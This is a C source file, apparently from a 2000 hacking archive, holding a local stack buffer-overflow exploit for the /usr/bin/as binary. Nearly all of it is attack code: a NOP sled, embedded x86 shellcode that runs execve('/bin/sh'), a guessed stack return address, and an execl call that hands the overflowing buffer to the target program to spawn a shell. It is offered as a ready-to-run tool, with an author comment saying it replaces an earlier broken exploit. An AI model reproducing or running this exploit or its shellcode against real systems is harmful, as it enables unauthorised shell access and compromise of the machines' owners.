/*

  Look, I've saw v9 exploit to /usr/bin/as binary, but I
  think the buffer is broken so I've made other exploit.

  flea@netc.pt <mailto:flea@netc.pt>

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define 	NOP 		0x90
#define 	BSIZE		2008
 
char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp() {
  __asm__("movl %esp, %eax");
}

main(int argc, char *argv[]) {
  char buffer[BSIZE];
  long address;

  if(argc == 1) {
    printf("As - exploit\n");
    printf("%s <offset>\n", argv[0]);
    exit(0);
  }

  if(strcmp(argv[1], "0") == 0) 
    address=0xbffffc38;
  else
    address=get_sp() - atoi(argv[1]);

  printf("using address: 0x%x\n", address);

  memset(buffer, NOP, BSIZE);

  memcpy(buffer+(BSIZE-4-strlen(shellcode)), shellcode, strlen(shellcode));
  *(long*) &buffer[BSIZE-4] = address;
  execl("/usr/bin/as","as", buffer, 0);
}
/*                    www.hack.co.za           [6 July 2000]*/